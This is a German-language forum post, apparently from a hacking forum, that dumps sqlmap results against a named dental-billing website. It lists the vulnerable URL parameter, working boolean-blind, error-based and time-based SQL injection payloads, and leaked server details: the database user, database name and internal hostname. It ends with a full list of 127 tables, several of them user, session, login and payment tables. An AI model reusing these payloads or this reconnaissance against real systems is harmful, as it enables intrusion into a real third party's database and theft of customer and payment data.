Keine Antworten in diesem Thema

[ASR]

http://www.abrechnung-zahnmedizin.de/index.php?id=70700_71538390&tx_txspihoznavi_pi1[tabName]=Analogleistungen&cHash=112d1f470853c46fa829899d753e4e46

Parameter: tx_txspihoznavi_pi1[tabName] (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=70700_71538390&tx_txspihoznavi_pi1[tabName]=-9666' OR 9736=9736#&cHash=112d1f470853c46fa829899d753e4e46
    Vector: OR [INFERENCE]#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: id=70700_71538390&tx_txspihoznavi_pi1[tabName]=-4163' OR 1 GROUP BY CONCAT(0x716a716b71,(SELECT (CASE WHEN (2144=2144) THEN 1 ELSE 0 END)),0x717a787071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&cHash=112d1f470853c46fa829899d753e4e46
    Vector: OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT - comment)
    Payload: id=70700_71538390&tx_txspihoznavi_pi1[tabName]=Analogleistungen' AND (SELECT * FROM (SELECT(SLEEP(5)))SNxx)#&cHash=112d1f470853c46fa829899d753e4e46
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])#
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
banner:    '5.5.40-cll-lve'
current user:    'infos_aportzmdev@%'
current database:    'infospitt137de1241_aportzm_dev'
hostname:    'vm-spitta-1.weber-ebusiness.de'
Database: infospitt137de1241_aportzm_dev
[127 tables]
+---------------------------------------------+
| backend_layout                              |
| be_groups                                   |
| be_sessions                                 |
| be_users                                    |
| cache_extensions                            |
| cache_hash                                  |
| cache_imagesizes                            |
| cache_md5params                             |
| cache_pages                                 |
| cache_pagesection                           |
| cache_treelist                              |
| cache_typo3temp_log                         |
| cachingframework_cache_hash                 |
| cachingframework_cache_hash_tags            |
| cachingframework_cache_pages                |
| cachingframework_cache_pages_tags           |
| cachingframework_cache_pagesection          |
| cachingframework_cache_pagesection_tags     |
| closure                                     |
| closure_pages                               |
| fe_groups                                   |
| fe_groups2                                  |
| fe_session_data                             |
| fe_session_log                              |
| fe_sessions                                 |
| fe_users                                    |
| hashtest                                    |
| pac_auth                                    |
| pages                                       |
| pages_language_overlay                      |
| panopticlick                                |
| panopticlick_machines                       |
| panopticlick_user                           |
| static_countries                            |
| static_country_zones                        |
| static_currencies                           |
| static_languages                            |
| static_markets                              |
| static_template                             |
| static_territories                          |
| static_tsconfig_help                        |
| sw_interface_log                            |
| sys_be_shortcuts                            |
| sys_domain                                  |
| sys_filemounts                              |
| sys_history                                 |
| sys_language                                |
| sys_lockedrecords                           |
| sys_log                                     |
| sys_news                                    |
| sys_note                                    |
| sys_preview                                 |
| sys_refindex                                |
| sys_refindex_rel                            |
| sys_refindex_res                            |
| sys_refindex_words                          |
| sys_registry                                |
| sys_template                                |
| sys_ter                                     |
| sys_workspace                               |
| sys_workspace_cache                         |
| sys_workspace_cache_tags                    |
| sys_workspace_stage                         |
| tit_cache                                   |
| tt_content                                  |
| tt_news2                                    |
| tt_news_pages_mm                            |
| tt_news_pages_mm2                           |
| tx_cronpayment_order                        |
| tx_cronpayment_paypal                       |
| tx_cronpayment_verifikationsdaten           |
| tx_cronpayment_worldpay                     |
| tx_extbase_cache_object                     |
| tx_extbase_cache_object_tags                |
| tx_extbase_cache_reflection                 |
| tx_extbase_cache_reflection_tags            |
| tx_fenestgrp                                |
| tx_impexp_presets                           |
| tx_macinabanners_banners                    |
| tx_macinabanners_categories                 |
| tx_macinabanners_stats                      |
| tx_protokoll_shop_auftrag                   |
| tx_realurl_chashcache                       |
| tx_realurl_errorlog                         |
| tx_realurl_pathcache                        |
| tx_realurl_redirects                        |
| tx_realurl_uniqalias                        |
| tx_realurl_urldecodecache                   |
| tx_realurl_urlencodecache                   |
| tx_rsaauth_keys                             |
| tx_rtehtmlarea_acronym                      |
| tx_scheduler_task                           |
| tx_shop_download_tan                        |
| tx_shop_gutscheine                          |
| tx_spiabrechnungsportal_abrechnungsberatung |
| tx_spiauthor_data                           |
| tx_spidentkom_users                         |
| tx_spiheidelpay_order                       |
| tx_spihoz_analogleistung                    |
| tx_spihoz_metadata                          |
| tx_spiinterface_unkown_users                |
| tx_spiinterfaceorderofsap_xml               |
| tx_spiinterfaceordersapof_pac               |
| tx_spiinterfaceordersapof_xml               |
| tx_spiinterfaceprodsapof_mat                |
| tx_spilandingpage_orders                    |
| tx_spilandingpage_v1                        |
| tx_spilandingpage_v2                        |
| tx_spiloginlog                              |
| tx_spilucenesearch_protocol                 |
| tx_spimeinspitta_agency                     |
| tx_spimeinspitta_agency2                    |
| tx_spimeinspitta_cdrom                      |
| tx_spimeinspitta_newsletter_register        |
| tx_spimeinspitta_notizen                    |
| tx_spimeinspitta_points_orders              |
| tx_spimeinspitta_print_downloads            |
| tx_spimeinspitta_print_downloads_stats      |
| tx_spisearch_extender                       |
| tx_spishortlink_data                        |
| tx_spistartpage_downloads                   |
| tx_spistartpage_news                        |
| tx_spitags_elements                         |
| tx_staticinfotables_hotlist                 |
| tx_templavoila_datastructure                |
| tx_templavoila_tmplobj                      |
| zz_aport_abo                                |
+---------------------------------------------+

Bearbeitet von ASR, 02 March 2015 - 15:11 Uhr.